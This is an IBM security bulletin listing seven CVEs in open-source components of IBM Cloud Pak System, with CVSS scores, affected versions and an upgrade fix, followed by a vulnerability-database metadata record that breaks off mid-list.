Security Bulletin: Multiple vulnerabilities in Open Source used in IBM Cloud Pak System

2020-07-07T16:58:28

Description

## Summary Multiple vulnerabilities identified in Open Source used in IBM Cloud Pak System. IBM Cloud Pak System addressed vulnerabilities. ## Vulnerability Details ** CVEID: **[CVE-2018-11771](<https://vulners.com/cve/CVE-2018-11771>) ** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by the failure to return the correct EOF indication after the end of the stream has been reached by the ZipArchiveInputStream method. By reading a specially crafted ZIP archive, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. CVSS Base score: 3.1 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/148429](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148429>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L) ** CVEID: **[CVE-2014-3578](<https://vulners.com/cve/CVE-2014-3578>) ** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request to view arbitrary files on the system. CVSS Base score: 5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93774](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93774>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) ** CVEID: **[CVE-2017-12626](<https://vulners.com/cve/CVE-2017-12626>) ** DESCRIPTION: **Apache POI is vulnerable to a denial of service, caused by an error while parsing malicious WMF, EMF, MSG and macros and specially crafted DOC, PPT and XLS. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop or an out of memory exception. CVSS Base score: 5.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/138361](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138361>) for the current score. CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) ** CVEID: **[CVE-2019-12086](<https://vulners.com/cve/CVE-2019-12086>) ** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a Polymorphic Typing issue that occurs due to missing com.mysql.cj.jdbc.admin.MiniAdmin validation. By sending a specially-crafted JSON message, a remote attacker could exploit this vulnerability to read arbitrary local files on the server. CVSS Base score: 5.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/161256](<https://exchange.xforce.ibmcloud.com/vulnerabilities/161256>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) ** CVEID: **[CVE-2019-16942](<https://vulners.com/cve/CVE-2019-16942>) ** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a polymorphic typing issue in the commons-dbcp class. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. CVSS Base score: 9.8 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168254](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168254>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) ** CVEID: **[CVE-2019-16943](<https://vulners.com/cve/CVE-2019-16943>) ** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a polymorphic typing issue in the p6spy class. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. CVSS Base score: 9.8 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168255](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168255>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) ** CVEID: **[CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92889](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ## Affected Products and Versions Affected Product(s)| Version(s) ---|--- IBM Cloud Pak System| V2.3.0.1, V2.3.1.1 ## Remediation/Fixes For IBM Cloud Pak System V.2.3.0.1, V2.3.1.1, Upgrade to IBM Cloud Pak System V2.3.2.0 Information on upgrading can be found here: <http://www.ibm.com/support/docview.wss?uid=ibm10887959>. ## Workarounds and Mitigations None. ##

Affected Software

CPE Name	Name	Version
	ibm cloud pak system	2.3

{"id": "BE28B80282A36EB5AE12EA4346DFDEB6572CBBFD3F23A4A31E09F4406B8F71BD", "vendorId": null, "type": "ibm", "bulletinFamily": "software", "title": "Security Bulletin: Multiple vulnerabilities in Open Source used in IBM Cloud Pak System", "description": "## Summary\n\nMultiple vulnerabilities identified in Open Source used in IBM Cloud Pak System. IBM Cloud Pak System addressed vulnerabilities. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2018-11771](<https://vulners.com/cve/CVE-2018-11771>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by the failure to return the correct EOF indication after the end of the stream has been reached by the ZipArchiveInputStream method. By reading a specially crafted ZIP archive, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base score: 3.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/148429](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148429>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2014-3578](<https://vulners.com/cve/CVE-2014-3578>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request to view arbitrary files on the system. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93774](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93774>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \n** CVEID: **[CVE-2017-12626](<https://vulners.com/cve/CVE-2017-12626>) \n** DESCRIPTION: **Apache POI is vulnerable to a denial of service, caused by an error while parsing malicious WMF, EMF, MSG and macros and specially crafted DOC, PPT and XLS. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop or an out of memory exception. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/138361](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138361>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-12086](<https://vulners.com/cve/CVE-2019-12086>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a Polymorphic Typing issue that occurs due to missing com.mysql.cj.jdbc.admin.MiniAdmin validation. By sending a specially-crafted JSON message, a remote attacker could exploit this vulnerability to read arbitrary local files on the server. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/161256](<https://exchange.xforce.ibmcloud.com/vulnerabilities/161256>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2019-16942](<https://vulners.com/cve/CVE-2019-16942>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a polymorphic typing issue in the commons-dbcp class. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168254](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168254>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-16943](<https://vulners.com/cve/CVE-2019-16943>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a polymorphic typing issue in the p6spy class. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168255](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168255>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92889](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak System| V2.3.0.1, V2.3.1.1 \n \n\n\n## Remediation/Fixes\n\nFor IBM Cloud Pak System V.2.3.0.1, V2.3.1.1, \n\nUpgrade to IBM Cloud Pak System V2.3.2.0\n\nInformation on upgrading can be found here: <http://www.ibm.com/support/docview.wss?uid=ibm10887959>.\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "published": "2020-07-07T16:58:28", "modified": "2020-07-07T16:58:28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.ibm.com/support/pages/node/6244618", "reporter": "IBM", "references": [], "cvelist": ["CVE-2014-0114", "CVE-2014-3578", "CVE-2017-12626", "CVE-2018-11771", "CVE-2019-12086", "CVE-2019-16942", "CVE-2019-16943"], "immutableFields": [], "lastseen": "2023-02-27T21:54:10", "viewCount": 4, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2020:1644"]}, {"type": "atlassian", "idList": ["ATLASSIAN:FE-7345", "FE-7345"]}, {"type": "centos", "idList": ["CESA-2014:0474"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1480", "CPAI-2014-1535"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:DBBC716FD85510861511BDE10DD24963"]}, {"type": "cve", "idList": ["CVE-2014-0114", "CVE-2014-3540", "CVE-2014-3578", "CVE-2014-3893", "CVE-2017-12626", "CVE-2018-11771", "CVE-2019-10202", "CVE-2019-12086", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-3834"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1798-1:61C44", "DEBIAN:DLA-1798-1:E389B", "DEBIAN:DLA-1853-1:A6F5D", "DEBIAN:DLA-1943-1:5F5AB", "DEBIAN:DLA-1943-1:9AD98", "DEBIAN:DLA-57-1:29ABF", "DEBIAN:DLA-57-1:6DE0E", "DEBIAN:DSA-2940-1:494C4", "DEBIAN:DSA-4452-1:F65D2", "DEBIAN:DSA-4542-1:03F2D", "DEBIAN:DSA-4542-1:432E5"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-0114", "DEBIANCVE:CVE-2014-3578", "DEBIANCVE:CVE-2017-12626", "DEBIANCVE:CVE-2018-11771", "DEBIANCVE:CVE-2019-12086", "DEBIANCVE:CVE-2019-16942", "DEBIANCVE:CVE-2019-16943"]}, {"type": "f5", "idList": ["F5:K32562850", "SOL15282"]}, {"type": "fedora", "idList": ["FEDORA:0730C6051059", "FEDORA:0D4A66058533", "FEDORA:18A7960877B3", "FEDORA:277F560476FA", "FEDORA:2ED3A6058506", "FEDORA:30E656126A67", "FEDORA:398FD60CEC5A", "FEDORA:45E8A60321BE", "FEDORA:4D359608778C", "FEDORA:4FB5560427DA", "FEDORA:50818233B7", "FEDORA:53C3261278CC", "FEDORA:5E5506051725", "FEDORA:758FA61278EA", "FEDORA:772A7605712B", "FEDORA:882916051CFA", "FEDORA:929076060E6D", "FEDORA:A09EE6087595", "FEDORA:A8ABE60560A2", "FEDORA:AE8886060E81", "FEDORA:BA292604B38E", "FEDORA:BFF95608779F", "FEDORA:C91E46060E8C", "FEDORA:D3F4E61F0A04", "FEDORA:D948D608771F", "FEDORA:DA60861278C0"]}, {"type": "freebsd", "idList": ["BD159669-0808-11EB-A3A4-0019DBB15B3F"]}, {"type": "gentoo", "idList": ["GLSA-201607-09"]}, {"type": "github", "idList": ["GHSA-523C-XH4G-MH5M", "GHSA-5WW9-J83M-Q7QX", "GHSA-C27H-MCMW-48HV", "GHSA-FMMC-742Q-JG75", "GHSA-HRMR-F5M6-M9PQ", "GHSA-MX7P-6679-8G3Q", "GHSA-P66X-2CV9-QQ3V", "GHSA-RHCG-RWHX-QJ3J"]}, {"type": "githubexploit", "idList": ["95E9031F-A021-5296-ADC3-71E43A95A049", "B4CCD6DC-671B-58FE-9826-B4F9C361A650"]}, {"type": "ibm", "idList": ["0241AD14444530836D909285432DE0EF409B9993A9D61A28514B61A052400B84", "0309A53D35EF827194465C9C10BC98B7D4795038C7221686EE2E7A4669562BD7", "03691F1EE0B131D78EA0BD89002CC0B602DB37A603D015DF70107A778260C592", "03BBDC7050471C64169EF3EC23FC2B3C55CC822FFA0D98F53466C52354E175A2", "05F3179CA4EA0BE9438639B8694635EF9ED28DD0883291C40F5B2F720534F38C", "0805E7A2C6036D7FEBAF075EE767AB91B73C933992CD43256425DCE028EA66B7", "08ECBCA670F0B3F435801B7A34A3A7C7EF6315794FDF864F61E57E02C2E3EFDD", "0976C176E97A39F9A89AE40E674AFB87A89A5DB439E2A1C90351D75E792A52BF", "0A2242182FF9C6E616AD12CDAF12C0AD6141133E4FF262F6CC0FA251C0F7DD9F", "0F254BE920E96D803CA1A391E1B8A3B0C658E51C8C31B0AC0F95FEDD45279D52", "0F8C9B43069C04EF8D42F75FA8D42A5837D2A01F1B45F132DD6CE116C7562B83", "140E90DD98ED4CC1A8C413867579B2EF4F8885020D8C9B221D7DC0EFA3D20518", "144E2FDA5818BEDF6E97DA8F56942108258B6778FA9472BE0FB6E286C871A08B", "150C26A4B23CEB9D10D6B5FB3E82060606745E070EDD31CF3D53C5969B98B0BF", "19663A6693672015D5E48ABEE9A76AB50A1C71EE9CF0548228C739933A353C88", "1A7668E81452E83AB00678328095567DA17543F8BDE6DB1EE678E96C5B064FD6", "1A977E1D46AE4CB4B7068DB341125931FAD75C28D6703503973FFF9BE917887F", "1B99BE15EF0865EC7D6CAAD98E1510DF110D3FC32411F14658640A57804FCBB5", "1CC43C4A66365486759EFB8BF9ACE86934571B8459B6E66D63A5190659B18DB4", "1E014E7185ECE2676B9171118053A4D1DDB9F759CD3863CCB79D1B3DBD175B95", "1EBC77DA43FD0C2AC1B3FBFCD06096623AB926F98B7AC6367589E5222F2115BC", "1EC9D814A44355A00FF42F8C8587C9E7C452415354E28A889935185CB4613BD7", "2043A5155256050F160330C3A6F88A4EF47A0C2DE48EA69299E3599EEF5985A0", "204ADCCC258487D6D5F8C848C95DAB38413055F4AFD05DFCF56FD7435CBF7C69", "2EE903E19A7CD16A29F5CE603A6BE1444D228989B00F0695E0424CEFF2903C06", "2FE97BC0DB8A3B1BCF85FF8F69828770D4396C7CC3ABD37202D8089D2CADF87B", "31D7DCC8D683A82E44671DA5A38CDC1A58877727926C937FE8D9FD9EE9FD2370", "3230B5C261EC75BE3334755D51C9AB2E3BF3C718B1D0EB81405BE610E871641B", "3282DBAF074AFA6C97A473357736E8D5E80D6E12F0EAC7051F513FBF50E6124E", "341A93FC1A45E72ADD48241188A719F3789D0F8084730D93C2ACFB474C42ABB1", "35774A12657731256610BEB1ACB2AE99C105060354AA560F82DED28AE65A8B24", "3582AA92271267A0985635BDFBC8FC9F24691B1A4D1B420CDED32DF204F71D26", "366CE799D9AEE4234CE4D38A22D774A769300127F0319D9238DAEC27C48436E1", "373505685C2504F2E87D285F28BBBB2E73FE52DDBDB53C323BFA4E4CED76480B", "376BF79A42FDC2B79EA0ACE3299D7D2BC084C5F6732575256A96FE46F43D836F", "39D4A3024CD82E0AB1412C8F0B7DE6C9C896CC59E99FBAB7A5A61175586A3211", "39FB3D1F38AC89BD19681FEACE87FB4DAA9E420720F8827CC4AA35F63756931E", "3C85B3C7443FFDE0DF64A3D0D4869686417DA52714135E90BD49D23E0331CD9E", "3CE0DEF06FC9CE41C148F15E374E35024D02AFF49A540400F0AD056CB1C2A1C4", "3D3BF59CC576F554C3F716540167D85670B56CE61C0AA690764AE05CC62E23C5", "3D8540513E9389E52505EF4CCF99C1FC5DC8928BFA49128170D48087D1264725", "3E24178C007E709BA47FFA90778DD34D7B8EB78DA65A804C849ACB792DBEEBB8", "3E3AF8AC7BA63076BEE8FFB670B3A3F27E0903C83526E54496E50EB2DF74B875", "3E8AD8E5AA3CC6B39E8DB40BBEBEB8A2737CE40275360EB8D2C188A14A72D4E3", "3ED9EC3F8407924DA03D3ABC905C0426524C3277480EB60950F0B1E4F641977E", "418A4C8D1E8F2E8A923DFE2C36570B4A5EF7B515E050C0F19513AF3DAE7D2628", "41CB9666A88AE67D4A0558674B8CFDA62F160B6DDCBA3C10576515447887CF12", "48F32F0BE81F12977F3F77EC7A1B784BEEE2CB897C3A11E48967C396BAD27436", "4D4083B3DCF76307CD159ABFA977289BFD623C088D7406C26A2EE54773F4845C", "4F3266EA945DE8D8D2A40355E5B0F806639DB3718EB5A22B6BC31D1E5CD00CE7", "4F441F1EC2D2D7EA1D9033E689E8C62FE264F17CF627C618EF574955EF8C49D0", "50E6A01BD478DEED9D4635F64814BCBD9DE715353A82634EA217E4D53F3DC5D2", "5248B9256CAD1F8D158CE63A6D338882538AB4CB774063A0FD1F9D65202CEB84", "57B9CF39C18FB4A06D2E917933FA8D5E3C4A18F982A4708050D5715BD40B9C19", "5D1592EF6A8A0487A1F0041E7EB876063521BA5DA4C50816A5A8A2DE3D3E34EF", "615E4369D0B07E7BA358AF447BD05A3ACC0720A255109ADB57E2A2080DB3607A", "61FF6F10F0D76277F85A8A525D2C9989283AB04F3D830BEC0894CE78DF0624A3", "620DEEE8E25F410CD7D5D914617F8424D18C6FBA60049459E6DDEF27E51FE74C", "63C0560C61FE9A9777F6402C4988E794A31F66C8118AFA944D2596065F5D0454", "63C0B2B3226E3E98449887AA89E81C9B35F422CFE5D67FF9577B4EC869D9F5EB", "68E7DB3D7E398B2706226213F9B1A94ACD374A065EE9538BCE2CF140B065CB08", "69C147CB642B39AA3250947FC1868ED542CC9C2C3BED4BA821CAD9BA0F178E84", "6F9B3E5D97FDBB41059AA8C4DDC3F8C6E337642756FF537C16A61C7599D523B9", "704897FEF5CE3D4AA35FF51AE237FF23A83A38E10F9597332BAF89DF648929A5", "71A0E260D835E4FB784163408D486ADEA9933D2BF29E0D594920C0DE72D440F2", "71A473993D401FAFDA20A063C958EB3785E06B0F2833BBEB5FA0B1E2E3123139", "74ECBB84CE8413AF6DA93062925AAA87DD5232E1319904ACEC3D5A509E59A9F3", "77C6BF921A5EE4D83AAD3E81B0714C7F02AA72F5A80BC01802CC6F1440DE7948", "78F585E499684A44D21982BB07C498E010C527FBE1866DD676965E7AAD25664A", "790AEE8158E5072311EE0B1D8C1CACC2CAE27CA8C7B75F39AD990B40790CFB8C", "7911EC80C28F7BE157F66EC6B3E35B2999E41F97F4299CD83723DE004A5C5CC2", "7BE38BC9D9063F34BE9B8AEC73F5518E1D7B0EC8F35109DB2E64EBA48061A6DB", "7D46658778E442AD0D43B74E767B5638C73A3147A2AD662C6A1BAB31343A96D2", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "80489411CAB04FBDC8043529670BEC2C45004C175864AC8845B7DAE26D981661", "821E1DB28B993B7E69088C09D923B82E365EF4AA8DDDC41C9304F73839818821", "8275C3B123771E721297381D0F66E5CCB99C5D5EA14F12413C6DF109D950665B", "8677F08636676A812666D9173BE281822A35EA2589B586A211824F7B588BD018", "88E396C29AABC664ACC3D5B0A3797EDDA0587772D5D9F452A2E356E7CC5BCD5D", "8C5F9E00411BC48544E09C07DE0A9332CE9F2162272F1C9EE415D926FE3F077D", "8E4DBE94121ABE32EB52144CFDD57FDF0D6884516B0DEA8E9B75FEDC0CA31C5C", "8EFB8A654D3536DD4481500A7680D75E0B2A04D2F63C829CAE130B12A35D7ED3", "91C2C4E11969518B70A8C8F53536E1FA71DEC6EC24848AC3C98F5843AFBFD45E", "939CF579A3478DA004C0DC63764E80A5A7E567E4CDC2FE8D1D3D9C5336892035", "954F19165902A68FCC586E55B2FBAD28E4C66C71F4AECE8D5047BBAA35ABBC06", "9898A3EC8BF1E9FC2EAA662543E6514CFB2C354F067BA2E9DD0CFAE333F8B99F", "9A4B42181E5D8A9CEA3178AD3E0CFEA6672BA250DEBDA4E822FCC8B9D4F87CF1", "9D37182D92DF6AA8FA1CBC82F99316BF0499E63FFA722F6D8E8797E6C70FE0E5", "9DDD0F190508F2E7A5678CB2D1EED7DBB6DDCF4E86557DF2759A163E2BE27792", "A04FE2EEFC21C3A9305B1CF7463C731D28C17EB5521A8E54F5F564939C5E91E2", "A10E7A45BAB7A017FB419F00D57064F9A2482F36ECDBC49D11E209F1CC8D8A4C", "A49F8E92510CDD96D8127764BC310529CF44A60596DB14352FF329575652A707", "AC5DE01326AFA37CBA7F799502684F57AF3D9271EC49734648DB7797522AF2E8", "ADD0F839178755FA4DD912718C067188513D949DB4F98877C9A6309ED84FA4C9", "ADF0635C8C226573B68B90CCCD3BBEE5D58D01FA40BFFCEB1F024C6F94610012", "AE2D99F51F54FB9B9702B49C29BE274AEE8BC814AAE746C495B94D448A0B731E", "AF51E1CC97DA90D00CDACD35B02B7E7108FB894DA97EFC4B711F84EEBE554D1F", "B0A86AE748A5FEB5B28098C199E3AE109F5F415CD018723CC5E174C68579E28F", "B236D3400A0C6106EC62C77931DC3654EEBAB6EEA563B3344ECFF477FD634E81", "B2EA2FBA4D280351FEA7F9EC1921C448D44F4D9EC613590A87A15467F7D34153", "B5B6C4769983441433B811EF3AAED6CFC993849D42BC924ECF1CCA5E34838148", "B8C124EE4E419DE7F41A9CB0246E9FF21300C4C9A2734EF999830B9906B65133", "B8E199CFC7A9C8DCF033928312B9AE0E344AB91916C93723350723B89FCB619A", "BB06E8BD028B2DF581C4E507E45CF66921EDD872018812A67B8FFD9CD3141ABF", "BF241965E218490C5786B115CB2639A8CA788DC4170BC648A82E9FCC5A5AEBA4", "C034F4A93C7986F86B5276634B82B774DA1796B9A2CC2371DA4859670D82233E", "C2172119C7EA3C8DAF5775654958C15FAD557D43BF30EBA7616F82FFB6EA31E2", "C3B05CDEF184BFD293F7EDCB8C5A430A32B9D04DDF8336E289D0609D021B85C2", "C43D2CB156B7BD39FC113EAD22568306F95463D3E29CC3A697EB085F142533BB", "C5BECC1FF633D3A61CC27E6C697004609D2D53037AA1A203924F83717DF01AC2", "CA9DCF531A11B03DA139506DC9F6319E49C554DF0F64E8DEC99E49C30FB2656F", "CCFD0AA6FE0B04D655CB682E840C88D56CFE6066B6B9B349560AFB2C6DFBCB00", "CD8271F1E3A620207AA3EAC35F944E1453EFEBC4728A88B9C3D9D0DA7F511F56", "CDF8726CAC4FB89641972BE5C7E766A6A5B672703DBCD02B09164ED4A59A37D1", "CEF23955780B797D3E4DFF7B2586F5C1F6FE284FDC236FD6F838681B4A03628B", "CEFB2CDD169330DA5EC688A529952C2E9694D94C3E8E4A50C9011E9A9F7FD71F", "D073E08AD140CB6620590BE3498F8D2736D636AB608813B1FECA6FBC21280451", "D222C68A9F9279A22A6D872628487DC4677D4BD829C33171CED7B9CDFF159C1B", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D4F9AE28EA501CF2A176391E0E920E7B7FC3A2D7D8CE5319FAE6CA44DF5B1E04", "D6A278AD53F24F8C2A141B0CE86714271C028E265EA5E488D59254EE85EA8F0B", "D76879E8E9C0967E4A6B7FF8216C0847B633BB1DAC32CEE31E4544A60A45BA68", "D78944C84B5DC781DE9FF60E3429142DE64F0F3040B571360FB07D29CCB7FF6D", "DA6CCDF86949C91E3CDB7DD6338939531CDDAC3BE2000984206A1C2A539B8AD4", "DB0FA9F3BEEDABDE80F9E34B7FD19E3F236E4D322D5E55572DDDEC14A0312943", "DEAFA2DB54593AA80919E191E6F6089E8FC07DD6414224DF7420DF6F55DF4BC8", "DED899C681C4F01F658F5349E77058BDF8C51E88FADBC17AC63AAD856B4CADE5", "DF4E8F31FE043E3CFA77E41A2F0CE2691BCEBF5ACB3B2A8B13BD91911951419D", "E298AFAE6C10545EEFE2EDCB1E58ACEB81769C82FC173BB89206A046496B5501", "E31CD1CAA68AD6659A7C459337F50C896A6D30B1CC25BEF6FC361000F2ACE0D4", "E51DDF73E3F5CD96B12560329D18889F698C09D96494E43FCCF428FEC32A1F2E", "E5E882E54AFBD27E45C030839DACD6485753D5EE22D50022E3F5DC9AB418F901", "E77EC6F45B7D6E8BB278E220AB25F28DDD520313254120E5AA95ABE42DD9D030", "E9402FC09A28106AF2485DB38FE701AD9E89189CD8A1924DECD9BC2BFC341007", "EB488D986A623E81C07D5F38DFFA754649938084B72DDAA698DEA6B41BB73C49", "EC68A07B2C3DAE1C815890F259C28E42A77D5A3444423C6A6324A3D881B16265", "F0757274DB5D8329D95D7A6D4A3997DE0A00111E7975DD730038A4C7F5615F5B", "F0CF06A35CFB9F883DE74CA58FDA5FB8E4CD4EED75B2FA4B80389117E7AAC99D", "F9ED99C3F4B2D868A3826BA34135EFCC7EF1978329C535488F23E6CF98DA913D", "FE252D131D8F7560832F857A2E94C6660B4590940855E6B811C5BA4036C7A5C4", "FE682ECFC10CBB3EA19CC98A95397F776F34168220DD72550FAE4CF5E216A9CC"]}, {"type": "ics", "idList": ["ICSMA-20-184-01"]}, {"type": "jvn", "idList": ["JVN:19118282", "JVN:30962312", "JVN:49154900"]}, {"type": "mageia", "idList": ["MGASA-2014-0219", "MGASA-2019-0001", "MGASA-2021-0153"]}, {"type": "nessus", "idList": ["9699.PRM", "ACTIVEMQ_5_15_5.NASL", "APACHE_POI_3_17.NASL", "CENTOS8_RHSA-2020-1644.NASL", "CENTOS_RHSA-2014-0474.NASL", "DEBIAN_DLA-1798.NASL", "DEBIAN_DLA-1853.NASL", "DEBIAN_DLA-1943.NASL", "DEBIAN_DLA-57.NASL", "DEBIAN_DSA-2940.NASL", "DEBIAN_DSA-4452.NASL", "DEBIAN_DSA-4542.NASL", "FEDORA_2014-9380.NASL", "FEDORA_2018-1B7B0AD759.NASL", "FEDORA_2018-4F2C2615B3.NASL", "FEDORA_2018-D29BE920DC.NASL", "FEDORA_2019-99FF6AA32C.NASL", "FEDORA_2019-AE6A703B8F.NASL", "FEDORA_2019-B171554877.NASL", "FEDORA_2019-FB23ECCC03.NASL", "FREEBSD_PKG_BD159669080811EBA3A40019DBB15B3F.NASL", "GENTOO_GLSA-201607-09.NASL", "MANDRIVA_MDVSA-2014-095.NASL", "ORACLELINUX_ELSA-2014-0474.NASL", "ORACLE_EDQ_OCT_2014_CPU.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_OCT_2014.NASL", "ORACLE_OAAM_CPU_OCT_2014.NASL", "ORACLE_OATS_CPU_JAN_2020.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_APR_2020.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_OCT_2019.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_OCT_2019.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_APR_2020.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_OCT_2019.NASL", "ORACLE_RDBMS_CPU_JUL_2020.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_APR_2020.NBIN", "ORACLE_WEBCENTER_PORTAL_CPU_OCT_2019.NBIN", "ORACLE_WEBCENTER_SITES_APR_2020_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2020.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2014.NBIN", "REDHAT-RHSA-2014-0474.NASL", 